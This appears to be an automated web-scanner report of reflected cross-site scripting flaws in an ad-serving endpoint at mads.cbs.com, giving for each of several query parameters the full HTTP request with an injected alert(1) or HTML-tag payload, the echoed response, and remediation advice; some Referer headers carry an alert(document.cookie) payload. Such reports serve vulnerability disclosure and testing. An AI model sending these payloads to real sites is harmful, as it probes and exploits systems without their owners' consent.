/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1413876' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw9.cnet.com::1566353728 2 ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa822'%3balert(1)//7c0ff5d4906 was submitted in the BRAND parameter. This input was echoed as fa822';alert(1)//7c0ff5d4906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:49 GMT
Server: Apache/2.2
Content-Length: 1176
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:49 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=15150&sg=1815&o=19650%253a19806%253a&h=cn&p=2&b=57fa822';alert(1)//7c0ff5d4906&l=en_US&site=164&pt=6711&nd=19806&pid=&cid=&pp=100&e=&rqid=00c13-ad-e6:4D4EFAF8CFEA5&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=ww ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6afe3<a>ee014234579 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAP ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 26971*/alert(1)//df28e5b63e6 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:51 GMT
Server: Apache/2.2
Content-Length: 1175
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:51 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 35ae0<a>44ed3893763 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" - ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 4b426*/alert(1)//1050a777b41 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:17 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:17 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 6377c<a>3fffe363d11 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 95bb9*/alert(1)//5a7288748bb was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:05 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:36:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 45b84<a>3f59d2a0e54 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PA ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 60d21*/alert(1)//3098f5412a was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:05 GMT
Server: Apache/2.2
Content-Length: 1187
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:05 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 1aacb<a>a9e8aafda38 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRA ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 963a9*/alert(1)//e7e2702a46 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:33 GMT
Server: Apache/2.2
Content-Length: 1145
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:33:33 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NU ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 8321f<a>c1fffffa83 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_N ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 2dc21<a>6048630f020 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
Response
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE=' ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload cce01*/alert(1)//1575e9d6777 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:31 GMT
Server: Apache/2.2
Content-Length: 1194
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:31 GMT
